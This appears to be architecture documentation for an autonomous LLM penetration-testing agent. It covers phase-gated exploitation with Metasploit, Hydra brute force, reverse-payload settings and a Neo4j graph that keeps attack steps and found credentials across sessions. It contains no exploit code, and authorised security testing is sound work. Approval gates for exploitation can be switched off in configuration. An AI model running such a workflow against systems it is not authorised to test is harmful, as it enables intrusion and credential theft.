Note over A: Agent can reference qa_history<br/>in future decisions
flowchart TB
subgraph Objective1["Objective #1: Port scan"]
O1_START[User: "Scan ports on 192.168.1.1"]
O1_WORK[Agent executes naabu scan]
O1_DONE[Objective completed]
end
subgraph Objective2["Objective #2: Vulnerability scan"]
O2_START[User: "Check for CVEs"]
O2_DETECT[Detect new message after completion]
O2_CREATE[Create new ConversationObjective]
O2_WORK[Agent queries graph + analyzes]
O2_DONE[Objective completed]
end
subgraph Objective3["Objective #3: Exploit"]
O3_START[User: "Exploit CVE-2021-41773"]
O3_PHASE[Phase transition to exploitation]
O3_WORK[Agent runs Metasploit]
O3_DONE[Objective completed]
end
subgraph State["Persistent State"]
TRACE[execution_trace: All steps preserved]
TARGET[target_info: Accumulates across objectives]
HISTORY[objective_history: Completed objectives]
QA[qa_history: All Q&A preserved]
end
O1_START --> O1_WORK --> O1_DONE
O1_DONE --> O2_START
O2_START --> O2_DETECT --> O2_CREATE --> O2_WORK --> O2_DONE
O2_DONE --> O3_START
O3_START --> O3_PHASE --> O3_WORK --> O3_DONE
O1_DONE -.-> |Archive| HISTORY
O2_DONE -.-> |Archive| HISTORY
O3_DONE -.-> |Archive| HISTORY
O1_WORK -.-> TRACE
O2_WORK -.-> TRACE
O3_WORK -.-> TRACE
O1_WORK -.-> TARGET
O2_WORK -.-> TARGET
O3_WORK -.-> TARGET
style Objective1 fill:#7a7a7a
style Objective2 fill:#5a5a5a
style Objective3 fill:#6b6b6b
The system handles continuous conversations where users ask multiple sequential questions:
flowchart LR
subgraph Detection["New Objective Detection"]
MSG[New user message arrives]
CHECK{task_complete<br/>from previous?}
DIFF{Message differs<br/>from current objective?}
CREATE[Create new ConversationObjective]
end
subgraph Archive["Objective Archival"]
COMPLETE[Current objective completed]
OUTCOME[Create ObjectiveOutcome]
STORE[Add to objective_history]
PRESERVE[Preserve execution_trace,<br/>target_info, qa_history]
end
subgraph Phase["Phase Management"]
INFER[LLM classifies attack path<br/>+ required_phase]
DOWN{Downgrade to<br/>informational?}
AUTO[Auto-transition<br/>no approval needed]
UP{Upgrade to<br/>exploitation?}
APPROVAL[Require user approval]
end
MSG --> CHECK
CHECK -->|Yes| CREATE
CHECK -->|No| DIFF
DIFF -->|Yes| CREATE
COMPLETE --> OUTCOME --> STORE --> PRESERVE
CREATE --> INFER
INFER --> DOWN
DOWN -->|Yes| AUTO
DOWN -->|No| UP
UP -->|Yes| APPROVAL
| Field | Purpose |
|---|---|
conversation_objectives |
List of all objectives (current + future) |
current_objective_index |
Which objective is being worked on |
objective_history |
Completed objectives with their outcomes |
original_objective |
Backward compatibility with single-objective sessions |
EvoGraph is a persistent, evolutionary graph in Neo4j that runs parallel to the recon graph. While the recon graph captures what exists on the target's attack surface (domains, IPs, ports, services, vulnerabilities), EvoGraph captures what the agent did about it — every tool execution, every discovery, every failure, every strategic decision — across the entire attack lifecycle.
It transforms the agent from a stateless tool executor into a knowledge-accumulating system that learns from every session and builds on prior work.
The previous approach used a flat execution_trace — a linear list of ExecutionStep objects that was:
| Problem | Impact |
|---|---|
| Linear | No branching, no causal links between steps, no semantic grouping |
| Ephemeral | Lost when the session ended — only persisted in LangGraph checkpoint |
| Disconnected | No structured links to the recon graph (Domain, IP, CVE, etc.) |
| Context-blind | Every step looked the same regardless of significance — the LLM had to scan a wall of text to find what mattered |
| No failure learning | Failed attempts were buried chronologically, indistinguishable from successes |
EvoGraph solves all of these by replacing the flat trace with a structured, queryable, persistent graph.
EvoGraph introduces 5 node types, each serving a distinct purpose in the attack lifecycle:
classDiagram
class AttackChain {
+string chain_id
+string title
+string objective
+string status
+string attack_path_type
+int total_steps
+int successful_steps
+int failed_steps
+list phases_reached
+string final_outcome
}
class ChainStep {
+string step_id
+int iteration
+string phase
+string tool_name
+string tool_args_summary
+string thought
+string reasoning
+string output_summary
+bool success
+string error_message
+int duration_ms
}
class ChainFinding {
+string finding_id
+string finding_type
+string severity
+string title
+string evidence
+int confidence
+string phase
}
class ChainDecision {
+string decision_id
+string decision_type
+string from_state
+string to_state
+string reason
+string made_by
+bool approved
}
class ChainFailure {
+string failure_id
+string failure_type
+string tool_name
+string error_message
+string lesson_learned
+bool retry_possible
}
AttackChain "1" --> "*" ChainStep : HAS_STEP
ChainStep "1" --> "0..1" ChainStep : NEXT_STEP
ChainStep "1" --> "*" ChainFinding : PRODUCED
ChainStep "1" --> "*" ChainFailure : FAILED_WITH
ChainStep "1" --> "0..1" ChainDecision : LED_TO
ChainDecision "1" --> "0..1" ChainStep : DECISION_PRECEDED
| Node Type | Purpose | Created When |
|---|---|---|
| AttackChain | Root of an attack chain. Maps 1:1 to a chat session (chain_id = sessionId) |
_start_new_objective_node() via fire_create_attack_chain() |
| ChainStep | Each tool execution — tool name, arguments, output analysis, success/failure | _process_tool_output_node() via sync_record_step() |
| ChainFinding | Important intelligence discovered during a step — classified by type and severity | After step analysis via fire_record_finding() |
| ChainDecision | Strategic decision points — phase transitions, strategy changes, user approvals | On user approval/abort via fire_record_decision() |
| ChainFailure | Structured record of what was tried and why it failed, with lessons learned | When step fails via fire_record_failure() |
Finding Types: vulnerability_confirmed, credential_found, exploit_success, access_gained, privilege_escalation, service_identified, exploit_module_found, defense_detected, configuration_found, custom
Failure Types: exploit_failed, authentication_failed, connection_failed, permission_denied, timeout, tool_error, detection_blocked, payload_failed
Intra-chain relationships connect attack chain nodes to each other:
| Relationship | From → To | Purpose |
|---|---|---|
HAS_STEP |
AttackChain → ChainStep | Links chain root to its first step |
NEXT_STEP |
ChainStep → ChainStep | Sequential execution order — the evolutionary link |
PRODUCED |
ChainStep → ChainFinding | Step produced this finding |
FAILED_WITH |
ChainStep → ChainFailure | Step failed with this failure |
LED_TO |
ChainStep → ChainDecision | Step triggered a decision point |
DECISION_PRECEDED |
ChainDecision → ChainStep | Decision led to the next step |
Bridge relationships connect attack chain nodes back to the recon graph:
| Relationship | From → To | Purpose |
|---|---|---|
CHAIN_TARGETS |
AttackChain → IP / Subdomain / Port / CVE / Domain | The chain's primary target(s) in the recon graph |
STEP_TARGETED |
ChainStep → IP / Subdomain / Port | Infrastructure node this step acted on |
STEP_EXPLOITED |
ChainStep → CVE | CVE this step attempted to exploit |
STEP_IDENTIFIED |
ChainStep → Technology | Technology identified during this step |
FOUND_ON |
ChainFinding → IP / Subdomain | Where the finding was discovered |
FINDING_RELATES_CVE |
ChainFinding → CVE | CVE related to the finding |
CREDENTIAL_FOR |
ChainFinding → Service / Port | Service/port the credential works on |
flowchart LR
subgraph ReconGraph["Recon Graph (existing)"]
IP[IP]
Sub[Subdomain]
Port[Port]
CVE[CVE]
Tech[Technology]
Service[Service]
end
subgraph EvoGraphNodes["EvoGraph (attack chain)"]
AC[AttackChain]
CS1[ChainStep 1]
CS2[ChainStep 2]
CF[ChainFinding]
CFL[ChainFailure]
CD[ChainDecision]
end
AC -->|HAS_STEP| CS1
CS1 -->|NEXT_STEP| CS2
CS1 -->|PRODUCED| CF
CS2 -->|FAILED_WITH| CFL
CS2 -->|LED_TO| CD
AC -.->|CHAIN_TARGETS| IP
CS1 -.->|STEP_TARGETED| IP
CS1 -.->|STEP_EXPLOITED| CVE
CS2 -.->|STEP_IDENTIFIED| Tech
CF -.->|FOUND_ON| Sub
CF -.->|FINDING_RELATES_CVE| CVE
style ReconGraph fill:#2d2d2d,color:#fff
style EvoGraphNodes fill:#6e6e6e,color:#fff
EvoGraph writes happen at specific points in the orchestrator lifecycle. All writes are fire-and-forget (async, non-blocking) except sync_record_step() which blocks to ensure the step node exists before findings/failures reference it.
sequenceDiagram
participant User
participant Orch as Orchestrator
participant CG as chain_graph_writer
participant Neo4j
participant State as AgentState
User->>Orch: New message (start objective)
Orch->>CG: fire_create_attack_chain()
CG-->>Neo4j: MERGE AttackChain + CHAIN_TARGETS bridges
Note over CG,Neo4j: Async (fire-and-forget)
loop Each ReAct iteration
Orch->>Orch: Think → select tool → execute tool
Orch->>Orch: Analyze output (OutputAnalysisInline)
Orch->>State: Append to chain_findings_memory
Orch->>State: Append to chain_failures_memory (if failed)
Orch->>CG: sync_record_step()
CG->>Neo4j: CREATE ChainStep + bridge rels
Note over CG,Neo4j: Synchronous (blocking)
opt Finding produced
Orch->>CG: fire_record_finding()
CG-->>Neo4j: CREATE ChainFinding + PRODUCED + bridges
end
opt Step failed
Orch->>CG: fire_record_failure()
CG-->>Neo4j: CREATE ChainFailure + FAILED_WITH
end
Note over Orch,State: Next think step reads chain_*_memory<br/>via format_chain_context()
end
opt Phase transition
Orch->>State: Append to chain_decisions_memory
Orch->>CG: fire_record_decision()
CG-->>Neo4j: CREATE ChainDecision + LED_TO
end
Orch->>CG: fire_update_chain_status()
CG-->>Neo4j: SET status='completed', final_outcome
EvoGraph uses a dual-recording pattern: every significant event is written to both in-memory lists (for fast LLM context) and Neo4j (for persistence and cross-session querying). The two systems serve different purposes and never depend on each other at runtime.
flowchart TB
subgraph Event["Tool Execution Event"]
EXEC[Output analyzed by LLM]
end
subgraph InMemory["Working Memory (AgentState)"]
FM[chain_findings_memory]
FAILM[chain_failures_memory]
DM[chain_decisions_memory]
end
subgraph Persistent["Long-Term Memory (Neo4j)"]
CF[ChainFinding nodes]
CFL[ChainFailure nodes]
CD[ChainDecision nodes]
end
subgraph Prompt["System Prompt Injection"]
CC["{chain_context}<br/>format_chain_context()"]
PC["{prior_chain_history}<br/>format_prior_chains()"]
end
EXEC -->|"Append dict (instant)"| FM
EXEC -->|"Append dict (instant)"| FAILM
EXEC -->|"fire_record_* (async)"| CF
EXEC -->|"fire_record_* (async)"| CFL
FM --> CC
FAILM --> CC
DM --> CC
CF -.->|"query_prior_chains()<br/>(loaded once at session init)"| PC
CFL -.->|"query_prior_chains()<br/>(loaded once at session init)"| PC
style InMemory fill:#474747,color:#fff
style Persistent fill:#6e6e6e,color:#fff
style Prompt fill:#404040,color:#fff
Why not query Neo4j for the current session's context?
| Concern | Impact |
|---|---|
| Race condition | Graph writes are async. When think iteration N+1 runs, the write from iteration N may not have landed yet |
| Latency | A Neo4j query adds ~100-200ms per iteration. Over 15-30 iterations, that's 1.5-6s of added latency |
| Availability | If Neo4j is slow or unreachable, the agent cannot think at all |
The in-memory lists are the fast working memory for the current session. Neo4j is the persistent long-term memory for cross-session queries.
The old standalone Exploit node has been replaced by ChainFinding(finding_type="exploit_success"). When an exploit succeeds, fire_record_exploit_success() creates a ChainFinding with:
- Metasploit metadata: module path, payload, session ID
- Target metadata: attack type, target IP/port, CVE IDs, credentials
- Bridge relationships:
FOUND_ON→ target IP/Subdomain,FINDING_RELATES_CVE→ CVE - Step-level bridges:
STEP_TARGETED→ IP,STEP_EXPLOITED→ CVE
This replaces the old exploit_writer.py module entirely. The exploit success is now part of the attack chain graph rather than a disconnected standalone node.
When a new session starts, the orchestrator calls query_prior_chains() which loads up to 5 most recent completed/aborted chains for the same user and project. For each chain:
- Metadata: title, objective, status, attack path type, step counts, phases reached
- High-severity findings: only critical and high findings (to limit token usage)
- Failure lessons: lesson_learned from each ChainFailure
This is formatted by format_prior_chains() and injected into the {prior_chain_history} placeholder. The agent in session B knows what session A tried, what worked, and what failed — enabling it to build on prior work rather than repeating mistakes.
The {chain_context} placeholder in the system prompt is built by format_chain_context() from the three in-memory lists. It replaces the old flat execution trace with a structured, signal-first format:
| Section | Content | Purpose |
|---|---|---|
| Findings | [SEVERITY] title (step N) for each accumulated finding |
Instant signal — what has been discovered |
| Failed Attempts | [step N] failure_type: error_message / Lesson: ... |
What to avoid — lessons from failures |
| Decisions | [step N] decision_type: from → to (approved/rejected) |
Session trajectory — strategic turns |
| Recent Steps | Last 5 steps in compact form (tool, args, result) | Operational context — what just happened |
Compared to the old flat trace:
| Aspect | Old Flat Trace | New Chain Context |
|---|---|---|
| Structure | Every step formatted identically | Three semantic sections + recent steps |
| Signal | LLM must scan ALL steps to find what matters | Key findings at the top, severity-tagged |
| Failures | Just a step with success: false buried chronologically |
Separate section with lesson_learned |
| Decisions | Phase transitions look like regular steps | Explicit section showing who approved what |
| Scale | Grows linearly with step count (30 steps = huge prompt) | Findings/failures/decisions stay concise; only recent steps expand |
flowchart TB
subgraph Request["Incoming Request"]
USER[user_id: "user123"]
PROJ[project_id: "proj456"]
SESS[session_id: "sess789"]
end
subgraph Context["Context Injection"]
SET_CTX[set_tenant_context<br/>set_phase_context]
THREAD[Thread-local variables]
end
subgraph Neo4j["Neo4j Query Filtering"]
QUERY[LLM generates Cypher]
INJECT[Inject tenant filter]
FILTERED["WHERE n.user_id = 'user123'<br/>AND n.project_id = 'proj456'"]
end
subgraph Checkpoint["Session Checkpointing"]
CONFIG[LangGraph config with thread_id]
MEMORY[MemorySaver stores state]
RESUME[Resume from exact state]
end
USER --> SET_CTX
PROJ --> SET_CTX
SESS --> CONFIG
SET_CTX --> THREAD
THREAD --> INJECT
QUERY --> INJECT --> FILTERED
CONFIG --> MEMORY
MEMORY --> RESUME
flowchart TB
subgraph Params["Configuration (project_settings.py)"]
REQ_EXPL[REQUIRE_APPROVAL_FOR_EXPLOITATION]
REQ_POST[REQUIRE_APPROVAL_FOR_POST_EXPLOITATION]
ACT_POST[ACTIVATE_POST_EXPL_PHASE]
POST_TYPE[POST_EXPL_PHASE_TYPE]
end
subgraph Validation["Tool Execution Validation"]
CHECK_PHASE{Tool allowed<br/>in current phase?}
ALLOW[Execute tool]
DENY[Return error:<br/>"Tool not available in phase"]
end
subgraph Transition["Phase Transition"]
TO_INFO[To informational]
TO_EXPL[To exploitation]
TO_POST[To post_exploitation]
AUTO_OK[Auto-approve<br/>safe downgrade]
NEED_APPROVAL[Require user approval]
BLOCKED[Block if disabled]
end
CHECK_PHASE -->|Yes| ALLOW
CHECK_PHASE -->|No| DENY
TO_INFO --> AUTO_OK
TO_EXPL --> |REQ_EXPL=true| NEED_APPROVAL
TO_EXPL --> |REQ_EXPL=false| AUTO_OK
TO_POST --> |ACT_POST=false| BLOCKED
TO_POST --> |REQ_POST=true| NEED_APPROVAL
TO_POST --> |REQ_POST=false| AUTO_OK
The legacy flat format_execution_trace() has been replaced by format_chain_context(), which injects structured attack chain memory into the system prompt via the {chain_context} placeholder. See the EvoGraph — Semantic Chain Context section for the full format.
The new format puts signal up front rather than burying it in a chronological wall of text:
- Findings — accumulated
ChainFindingentries (severity, title, step number) listed first for instant signal - Failed Attempts — accumulated
ChainFailureentries withlesson_learnedso the LLM avoids repeating mistakes - Decisions — accumulated
ChainDecisionentries for context on the session's trajectory - Recent Steps — only the last 5 execution steps in compact form, with the most recent including full tool output
This scales as O(findings + failures + decisions + N) rather than O(total_steps), keeping the prompt size bounded while preserving the most valuable context. Cross-session context is injected separately via {prior_chain_history}, loaded once at session init.
Several prompt sections are only injected when relevant:
| Prompt Section | Condition |
|---|---|
| No-module fallback workflow | Only after search CVE-* returns no results |
| Failure loop warning | Only after 3+ consecutive similar failures |
| Mode decision matrix | Only in exploitation phase for CVE exploit path |
| Session config (LHOST/LPORT) | Only in statefull exploitation mode |
The orchestrator monitors the execution trace for repeated failures. When 3+ consecutive steps fail with a similar tool/args pattern, a ## FAILURE LOOP DETECTED warning is injected into the system prompt, instructing the agent to try a completely different strategy (web_search for alternatives, different tool/payload, or ask_user for guidance).
flowchart TB
RESPONSE[LLM Response Text]
EXTRACT[Extract JSON from response]
EXTRACT --> PARSE{Parse JSON?}
PARSE -->|Success| VALIDATE[Pydantic validation]
PARSE -->|Fail| FALLBACK_JSON[Try extract partial fields]
VALIDATE -->|Success| DECISION[LLMDecision object]
VALIDATE -->|Fail| PREPROCESS[Preprocess: remove empty objects<br/>user_question, phase_transition, output_analysis]
PREPROCESS --> VALIDATE2[Retry validation]
VALIDATE2 -->|Success| DECISION
VALIDATE2 -->|Fail| FALLBACK_DECISION[Fallback LLMDecision<br/>action=complete with error]
FALLBACK_JSON --> FALLBACK_ANALYSIS[Fallback: raw tool output<br/>used as interpretation]
flowchart LR
RAW[Raw msfconsole output]
ANSI[Remove ANSI escape sequences]
CR[Handle carriage returns]
CTRL[Remove control characters]
ECHO[Filter garbled echo lines]
TIMING[Timing-based output detection<br/>Wait for quiet period]
RAW --> ANSI --> CR --> CTRL --> ECHO --> TIMING --> CLEAN[Clean output]
flowchart TB
QUESTION[Natural language question]
GEN[LLM generates Cypher]
EXEC[Execute query]
EXEC --> CHECK{Success?}
CHECK -->|Yes| RESULT[Return results]
CHECK -->|No| RETRY_CHECK{Retries < MAX?}
RETRY_CHECK -->|Yes| CONTEXT[Add error context to prompt]
RETRY_CHECK -->|No| ERROR[Return error message]
CONTEXT --> GEN
Configuration is now database-driven. When PROJECT_ID and WEBAPP_API_URL environment variables are set, settings are fetched from PostgreSQL via the webapp API. Otherwise, DEFAULT_AGENT_SETTINGS provides fallback values for standalone usage.
flowchart LR
DB[(PostgreSQL)] --> API[Webapp API<br/>/api/projects/:id]
API --> PS[project_settings.py<br/>get_setting]
PS --> ORCH[Orchestrator]
PS --> PROMPTS[Prompts]
PS --> TOOLS[Tools]
DEFAULTS[DEFAULT_AGENT_SETTINGS] -.->|fallback| PS
| Parameter | Default | Description |
|---|---|---|
OPENAI_MODEL |
"claude-opus-4-6" |
LLM model for reasoning |
MAX_ITERATIONS |
100 |
Maximum ReAct loop iterations |
EXECUTION_TRACE_MEMORY_STEPS |
100 |
How many steps to include in LLM context |
TOOL_OUTPUT_MAX_CHARS |
20000 |
Truncate tool output for LLM analysis |
REQUIRE_APPROVAL_FOR_EXPLOITATION |
true |
Require user approval for exploitation phase |
REQUIRE_APPROVAL_FOR_POST_EXPLOITATION |
true |
Require user approval for post-exploitation |
ACTIVATE_POST_EXPL_PHASE |
true |
Enable post-exploitation phase |
POST_EXPL_PHASE_TYPE |
"statefull" |
"stateless" or "statefull" session mode |
LHOST |
"" |
Attacker IP for reverse payloads (empty = bind mode) |
LPORT |
null |
Attacker port for reverse payloads |
BIND_PORT_ON_TARGET |
4444 |
Port opened on target for bind payloads |
PAYLOAD_USE_HTTPS |
false |
Use HTTPS for staged payloads |
HYDRA_ENABLED |
true |
Enable/disable THC Hydra brute force tool |
HYDRA_THREADS |
16 |
Parallel connections per target (-t). SSH max 4, RDP max 1 |
HYDRA_WAIT_BETWEEN_CONNECTIONS |
0 |
Seconds between connections per task (-W) |
HYDRA_CONNECTION_TIMEOUT |
32 |
Max seconds to wait for response (-w) |
HYDRA_STOP_ON_FIRST_FOUND |
true |
Stop on first valid credential (-f) |
HYDRA_EXTRA_CHECKS |
"nsr" |
Extra checks: n=null, s=login-as-pass, r=reversed (-e) |
HYDRA_VERBOSE |
true |
Show each login attempt (-V) |
HYDRA_MAX_WORDLIST_ATTEMPTS |
3 |
Max wordlist strategies before giving up |
INFORMATIONAL_SYSTEM_PROMPT |
"" |
Custom system prompt injected during informational phase |
EXPL_SYSTEM_PROMPT |
"" |
Custom system prompt injected during exploitation phase |
POST_EXPL_SYSTEM_PROMPT |
"" |
Custom system prompt injected during post-exploitation phase |
CYPHER_MAX_RETRIES |
3 |
Neo4j text-to-Cypher retry limit |
CREATE_GRAPH_IMAGE_ON_INIT |
false |
Export LangGraph structure as PNG on startup |
TOOL_PHASE_MAP |
(see below) | Per-tool phase access control (DB-driven) |
{
"query_graph": ["informational", "exploitation", "post_exploitation"],
"execute_curl": ["informational", "exploitation", "post_exploitation"],
"execute_naabu": ["informational", "exploitation", "post_exploitation"],
"execute_nmap": ["informational", "exploitation", "post_exploitation"],
"execute_nuclei": ["informational", "exploitation", "post_exploitation"],
"kali_shell": ["informational", "exploitation", "post_exploitation"],
"execute_code": ["exploitation", "post_exploitation"],
"metasploit_console": ["exploitation", "post_exploitation"],
"msf_restart": ["exploitation", "post_exploitation"],
"web_search": ["informational", "exploitation", "post_exploitation"]
}| Variable | Required | Description |
|---|---|---|
OPENAI_API_KEY |
Yes | OpenAI API key for LLM calls |
NEO4J_URI |
Yes | Neo4j connection URI |
NEO4J_USER |
Yes | Neo4j username |
NEO4J_PASSWORD |
Yes | Neo4j password |
PROJECT_ID |
For DB settings | Project ID to fetch settings for |
WEBAPP_API_URL |
For DB settings | Webapp base URL (e.g., http://localhost:3000) |
MCP_NETWORK_RECON_URL |
No | Network recon MCP server URL (default: http://host.docker.internal:8000/sse) |
MCP_NMAP_URL |
No | Nmap MCP server URL (default: http://host.docker.internal:8004/sse) |
MCP_METASPLOIT_URL |
No | Metasploit MCP server URL (default: http://host.docker.internal:8003/sse) |
MCP_NUCLEI_URL |
No | Nuclei MCP server URL (default: http://host.docker.internal:8002/sse) |
The MCP layer runs inside a single Kali Linux Docker container with multiple FastMCP servers:
| Server | Port | Tools | Description |
|---|---|---|---|
network_recon |
8000 | execute_curl, execute_naabu, kali_shell, execute_code |
HTTP client, port scanner, general shell, code execution |
nuclei |
8002 | execute_nuclei |
CVE verification & exploitation via YAML templates |
metasploit |
8003 | metasploit_console, msf_restart, msf_session_run, msf_wait_for_session, msf_list_sessions |
Exploitation framework |
nmap |
8004 | execute_nmap |
Deep network scanning, service detection, NSE scripts |
cd mcp/
docker-compose up -dcd agentic/
docker-compose up -d
# Or for development:
uvicorn api:app --reload --port 8080const ws = new WebSocket('ws://localhost:8080/ws');
// Authenticate
ws.send(JSON.stringify({
type: 'init',
payload: { user_id: 'user123', project_id: 'proj456', session_id: 'sess789' }
}));
// Send query
ws.send(JSON.stringify({
type: 'query',
payload: { question: 'Scan ports on 192.168.1.1' }
}));
// Send guidance while agent is working
ws.send(JSON.stringify({
type: 'guidance',
payload: { message: 'Focus on port 22 first' }
}));
// Stop agent execution
ws.send(JSON.stringify({ type: 'stop', payload: {} }));
// Resume from last checkpoint
ws.send(JSON.stringify({ type: 'resume', payload: {} }));
// Handle responses
ws.onmessage = (event) => {
const msg = JSON.parse(event.data);
console.log(msg.type, msg.payload);
};The RedAmon Agentic System provides:
- Autonomous Reasoning - LangGraph-based ReAct pattern for intelligent decision making
- Phase-Based Security - Controlled progression through informational → exploitation → post-exploitation
- Attack Path Classification - LLM-based classification of objectives into CVE exploit or brute force paths, with secondary fallback path support
- Dynamic Tool Registry - Single source of truth (
tool_registry.py) drives all prompt generation; tool availability tables, argument references, and phase definitions are built at runtime from DB-drivenTOOL_PHASE_MAP - Human Oversight - Approval workflows for risky phase transitions and pre-exploitation validation
- Real-Time Feedback - WebSocket streaming with progress chunks for long-running commands
- Live Guidance - Send steering messages while the agent works, injected into the next think step
- Stop & Resume - Interrupt agent execution and resume from the last LangGraph checkpoint
- Multi-Tenancy - Isolated sessions with tenant-filtered data access
- Stateful Exploitation - Persistent Metasploit sessions with auto-reset and session/credential detection
- No-Module Fallback - When Metasploit has no module for a CVE, the agent falls back to manual exploitation using curl, nuclei, code execution, and Kali shell tools
- Failure Loop Detection - Detects 3+ consecutive similar failures and forces the agent to pivot to a different strategy
- Token Optimization - Compact formatting for older execution trace steps; conditional prompt injection to minimize token usage
- Expanded Kali Tooling - nmap, nuclei, kali_shell (netcat, socat, sqlmap, john, searchsploit, msfvenom, gcc/g++), and execute_code for shell-escaping-free script execution
- Multi-Objective Support - Continuous conversations with context preservation and per-objective attack path classification
- Database-Driven Configuration - All settings fetched from PostgreSQL via webapp API, with standalone defaults fallback
- Custom Phase Prompts - Per-phase system prompt injection for project-specific agent behavior
- MCP Retry Logic - Exponential backoff retry for MCP server connections to handle container startup races
- EvoGraph - Persistent evolutionary attack chain graph in Neo4j tracking every step, finding, decision, and failure. Dual memory architecture (in-memory for speed, Neo4j for persistence) with bridge relationships to the recon graph and cross-session evolutionary learning